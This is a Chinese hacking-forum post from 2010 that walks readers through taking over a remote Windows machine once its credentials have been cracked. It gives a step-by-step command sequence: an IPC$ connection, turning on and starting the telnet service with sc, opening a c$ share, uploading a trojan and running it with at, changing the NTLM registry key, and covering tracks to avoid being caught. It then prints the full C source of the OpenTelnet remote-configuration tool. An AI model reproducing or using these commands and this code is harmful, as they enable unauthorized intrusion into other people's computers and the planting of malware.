论坛徽章:: 0

发表于 2010-07-23 19:04 |显示全部楼层

也许，你刚开始的时候跟我可能有同样的困惑，就是扫描到了一台主机的主机和密码，却苦于无法开启远程telnet服务而无法登录。。 现在我介绍一下怎样开启远程telnet服务。。 如何远程打开telnet服务？首先，你必须拿到你所要登录的主机用户名和密码，有了这2样就好办了，嘿嘿。。。 　　 　　--0、侦测远程机器口令，假如我获得用户名是administrator，密码是空的。。 　　 　　--1、netuse命令建立IPC连接 　　net use [url=file://\\IP]\\IP[/url] password /user<img src="http://bbs.chinaitlab.com/images/smilies/mogutou/thumb_04sc23752.gif" smilieid="37" border="0" alt="" />dministrator 　　 　　--用sc命令把禁用的telnet服务变成自动 　　sc [url=file://\\IP]\\IP[/url] config tlntsvr start= auto 　　 　　--2、用sc命令将telnet启动 　　sc [url=file://\\IP]\\IP[/url] start tlntsvr 　　 　　--3、net share 建立c$共享 　　net share sharename=drive:path 　　 　　--4、copy命令上传木马 　　copy a.bat [url=file://\\192.168.0.1\c$]\\192.168.0.1\c$[/url] 　　 　　--5、at命令定时执行 　　at [url=file://\\192.168.0.1]\\192.168.0.1[/url] time cmd 注意：如果对方采用了NTLM认证策略，可以连接网络注册表修改HKEYLOCAL\ MACHINE\SOFTWARE\MICROSOFT\TELNETSERVER\1.0下的NTLM键值由2改为0。 然后重新启动telnet服务。 　　--6、用sc命令将telnet关闭，吃完鸡，别忘了把嘴上油给擦干净哦，被抓到了就不好了。。 　　sc [url=file://\\IP]\\IP[/url] stop tlntsvr 　　--7、用sc命令将telnet启动 　　sc [url=file://\\IP]\\IP[/url] start tlntsvr 以上只是用命令来实现的，其实也有一种更简单的方法，现在网上有人编写一个叫opentelnet的程序，初学者可以试试，挺方便的，不过貌似没什么技术含量，不过瘾。。。 下面我们来个更过瘾的，自己来编一个开启远程telnet服务的程序，O(∩_∩)O哈哈~。。 准备好编译器VC++ 6.0 ，如果你连这个都没的话，你就不要说你在IT界混了，编写一个C++ 程序。。。 <blockquote>//////////////////////////////////////////////////////////////////////////////// // // Telnet Remote Configure And Wake Up // //////////////////////////////////////////////////////////////////////////////// #include <stdio.h> #include <assert.h> #include <windows.h> #include <Winnetwk.h> #include <Winreg.h> #include <Shlwapi.h> #pragma comment(lib, "Advapi32.lib&quot

#pragma comment(lib, "Mpr.lib&quot

SC_HANDLE g_schSCManager; HKEY g_hKey; DWORD g_DefaultTelnetStartType; DWORD g_DefaultRegistryStartType; LPBYTE g_lpDefaultTelnetNTLM; LPBYTE g_lpDefaultTelnetPort; void Usage(char*); int RestartTelnet(); int StartRemoteRegistry(); int MyStartService(SC_HANDLE, char*); int main(int argc, char* argv[]) { int nRetCode; char szIpc[50] = ""; HKEY hKey; LPSTR lpUserName, lpPassword; NETRESOURCE NET; DWORD dwNTLM, dwTelnetPort; Usage(argv[0]); if (argc < 5) return 0; sprintf (szIpc, "%s\\ipc$", argv[1]); lpUserName = argv[2]; lpPassword = argv[3]; NET.lpLocalName = NULL; NET.lpRemoteName = szIpc; NET.dwType = RESOURCETYPE_ANY; NET.lpProvider = NULL; printf ("Connecting %s...",argv[1]); ReConnect: nRetCode = WNetCancelConnection2(szIpc, CONNECT_UPDATE_PROFILE, TRUE); if (nRetCode == NO_ERROR) printf ("Canncel Successfully!\n&quot

; nRetCode = WNetAddConnection2(&NET, lpPassword, lpUserName, CONNECT_INTERACTIVE); if (nRetCode == ERROR_ALREADY_ASSIGNED || nRetCode == ERROR_DEVICE_ALREADY_REMEMBERED) { printf ("Already conneted to the server!\n&quot

; printf ("Now re-connecting the server...\n&quot

; goto ReConnect; } else if (nRetCode == NO_ERROR) printf ("Successfully!\n&quot

; else { printf ("\n\tErr:&quot

; switch (nRetCode) { case ERROR_ALREADY_ASSIGNED: case ERROR_ACCESS_DENIED: printf ("ERROR_ACCESS_DENIED\n&quot

; break; case ERROR_BAD_NET_NAME: printf ("ERROR_BAD_NET_NAME\n&quot

; break; default: printf ("CONNECT ERR:%d!\n",GetLastError()); break; } return 0; } //open SCManager g_schSCManager = OpenSCManager(argv[1], NULL, SC_MANAGER_ALL_ACCESS); if (g_schSCManager == NULL) { printf ("Open SCManager failed!\n&quot

; return 0; } //check remote registry service is running if (!StartRemoteRegistry()) { printf ("All Process Failed!\n"); return 0; } //open the registry if (!(RegConnectRegistry((LPCTSTR) argv[1], HKEY_LOCAL_MACHINE, &g_hKey) == ERROR_SUCCESS)) { printf ("Connect remote registry failed!\n"); return 0; } if (!(RegOpenKeyEx(g_hKey, "SOFTWARE\\Microsoft\\TelnetServer\\1.0", 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS)) { printf ("Open key failed!\n"); return 0; } //read the registry for default config g_lpDefaultTelnetNTLM = (LPBYTE) LocalAlloc(LPTR, 50); g_lpDefaultTelnetPort = (LPBYTE) LocalAlloc(LPTR, 50); DWORD dwDataSize = 50; if (!(RegQueryValueEx(hKey, "NTLM", NULL, NULL, g_lpDefaultTelnetNTLM, &dwDataSize) == ERROR_SUCCESS)) { printf ("Read NTLM failed!\n "); return 0; } if (!(RegQueryValueEx(hKey, "TelnetPort", NULL, NULL, g_lpDefaultTelnetPort, &dwDataSize) == ERROR_SUCCESS)) { printf ("Read port failed!\n "); return 0; } //edit the registry dwNTLM = atoi(argv[4]); if (dwNTLM >= 3) { dwNTLM = 1; } dwTelnetPort = atoi(argv[5]); if (!(RegSetValueEx(hKey, "NTLM", 0, REG_DWORD, (LPBYTE) &dwNTLM, sizeof(DWORD)) == ERROR_SUCCESS)) { printf ("Set NTLM value failed!"); return 0; } RegSetValueEx(hKey, "TelnetPort", 0, REG_DWORD, (LPBYTE) &dwTelnetPort, sizeof(DWORD)); //restart telnet service nRetCode = RestartTelnet(); if (nRetCode) { printf ("\nBINGLE!!!Yeah!!\n"); printf ("Telnet Port is %d. You can try:\"telnet ip %d\", to connect the server!", dwTelnetPort, dwTelnetPort); } //remain the default setting if (!(RegSetValueEx(hKey, "default_NTLM", 0, REG_DWORD, g_lpDefaultTelnetNTLM, sizeof(DWORD)) == ERROR_SUCCESS)) { printf ("Set defaultNTLM value failed!"); return 0; } if (!(RegSetValueEx(hKey, "default_Port", 0, REG_DWORD, g_lpDefaultTelnetPort, sizeof(DWORD)) == ERROR_SUCCESS)) { printf ("Set defaultPort value failed!"); return 0; } if (!(RegSetValueEx(hKey, "default_TelnetStart", 0, REG_DWORD, (LPBYTE) &g_DefaultTelnetStartType, sizeof(DWORD)) == ERROR_SUCCESS)) { printf ("Set defaulttelnetstart value failed!"); return 0; } if (!(RegSetValueEx(hKey, "default_RegistryStart", 0, REG_DWORD, (LPBYTE) &g_DefaultRegistryStartType, sizeof(DWORD)) == ERROR_SUCCESS)) { printf ("Set defaultregistrystart value failed!"); return 0; } RegCloseKey(hKey); RegCloseKey(g_hKey); //close SCManager CloseServiceHandle(g_schSCManager); //close the session with remote server printf ("\nDisconnecting server..."); nRetCode = WNetCancelConnection2(argv[1], CONNECT_UPDATE_PROFILE, TRUE); if (nRetCode == NO_ERROR) printf ("Successfully!\n"); else printf ("Failed!\n"); return 0; } void Usage(char* pcAppName) { printf ("*******************************************************\n"); printf ("Remote Telnet Configure, by refdom\n"); printf ("Email: refdom@263.net\n"); printf ("%s\n\n", pcAppName); printf ("Usage:OpenTelnet.exe [url=]\\\\server[/url] username password NTLMAuthor telnetport\n"); printf ("*******************************************************\n"); return; } int RestartTelnet() { DWORD dwWaitTime; DWORD dwConfigSize; SC_HANDLE schTelnetService; SERVICE_STATUS ssTelnetStatus; LPQUERY_SERVICE_CONFIG lpTelnetConfig; printf ("\nNOTICE!!!!!!\n"); printf ("The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23\n\n"); //stop the telnet service schTelnetService = OpenService(g_schSCManager, "TlntSvr", SERVICE_ALL_ACCESS); if (schTelnetService == NULL) { printf ("Open service failed!\n"); return 0; } lpTelnetConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024); if (lpTelnetConfig == NULL) { printf ("Alloc memory failed!\n"); return 0; } if (!QueryServiceConfig(schTelnetService, lpTelnetConfig, 1024, &dwConfigSize)) { printf ("Query service congfig failed!\n"); return 0; } //remain the fault start ytpe of telnet service g_DefaultTelnetStartType = lpTelnetConfig->dwStartType; //change the start type of the telnet service if (lpTelnetConfig->dwStartType == SERVICE_DISABLED) { if (!ChangeServiceConfig(schTelnetService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL, NULL)) { printf ("Change service config failed!\n"); return 0; } } if (!(QueryServiceStatus(schTelnetService, &ssTelnetStatus))) { printf ("Query service status failed!\n"); return 0; } if (ssTelnetStatus.dwCurrentState != SERVICE_STOPPED && ssTelnetStatus.dwCurrentState != SERVICE_STOP_PENDING) { printf ("Stopping telnet service ...\n"); if (!(ControlService(schTelnetService, SERVICE_CONTROL_STOP, &ssTelnetStatus))) { printf ("Control telnet service status failed!\n"); return 0; } dwWaitTime = ssTelnetStatus.dwWaitHint / 10; if( dwWaitTime < 1000 ) dwWaitTime = 1000; else if ( dwWaitTime > 10000 ) dwWaitTime = 10000; Sleep(dwWaitTime); if (!QueryServiceStatus(schTelnetService, &ssTelnetStatus)) { printf ("Query service status failed!\n"); } if ( ssTelnetStatus.dwCurrentState == SERVICE_STOPPED || ssTelnetStatus.dwCurrentState == SERVICE_STOP_PENDING) { printf ("Telnet service is stopped successfully!\n"); } else { printf ("Stopping telnet service failed!\n"); return 0; } } //start the telnet service if (!MyStartService(schTelnetService, "telnet")) return 0; CloseServiceHandle(schTelnetService); return 1; } int StartRemoteRegistry() { SC_HANDLE schRegistryService; SERVICE_STATUS ssRegistryStatus; LPQUERY_SERVICE_CONFIG lpRegistryConfig; DWORD dwConfigSize; lpRegistryConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024); if (lpRegistryConfig == NULL) { printf ("Alloc memory failed!\n"); return 0; } schRegistryService = OpenService( g_schSCManager, "RemoteRegistry", SERVICE_ALL_ACCESS); if (schRegistryService == NULL) { printf ("Open remote registry service failed!\n"); return 0; } if (!QueryServiceConfig(schRegistryService, lpRegistryConfig, 1024, &dwConfigSize)) { printf ("Query registry service config failed!\n"); return 0; } g_DefaultRegistryStartType = lpRegistryConfig->dwStartType; if (g_DefaultRegistryStartType == SERVICE_DISABLED) { if (!ChangeServiceConfig(schRegistryService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL,NULL)) { printf ("Change registry service config failed!\n"); return 0; } } if (!QueryServiceStatus(schRegistryService, &ssRegistryStatus)) { printf ("Query remote registry service failed!\n"); return 0; } if (ssRegistryStatus.dwCurrentState != SERVICE_RUNNING) { if (!MyStartService(schRegistryService, "remote registry")) return 0; } CloseServiceHandle(schRegistryService); return 1; } int MyStartService(SC_HANDLE schService, char* szServiceName) { DWORD dwWaitTime; DWORD dwOldCheckPoint; DWORD dwStartTickCount; SERVICE_STATUS ssStatus; printf ("Starting %s service...\n", szServiceName); if (!(StartService(schService, 0, NULL))) { printf ("Starting %s service failed!\n", szServiceName); return 0; } if (!(QueryServiceStatus(schService, &ssStatus))) { printf ("Query %s service status failed!\n",szServiceName); // return ; } dwStartTickCount = GetTickCount(); dwOldCheckPoint = ssStatus.dwCheckPoint; while ( ssStatus.dwCurrentState == SERVICE_START_PENDING) { dwWaitTime = ssStatus.dwWaitHint / 10; if( dwWaitTime < 1000 ) dwWaitTime = 1000; else if ( dwWaitTime > 10000 ) dwWaitTime = 10000; Sleep(dwWaitTime); // Check the status again. if (!QueryServiceStatus(schService, &ssStatus)) break; if ( ssStatus.dwCheckPoint > dwOldCheckPoint ) { // The service is making progress. dwStartTickCount = GetTickCount(); dwOldCheckPoint = ssStatus.dwCheckPoint; } else { if(GetTickCount()-dwStartTickCount > ssStatus.dwWaitHint) { // No progress made within the wait hint break; } } } if ( ssStatus.dwCurrentState == SERVICE_RUNNING ) { printf ("%s service is started successfully! %s service is running!\n", szServiceName, szServiceName); } else { printf ("%s service is not started!\n", szServiceName); return 0; } return 1; } </blockquote>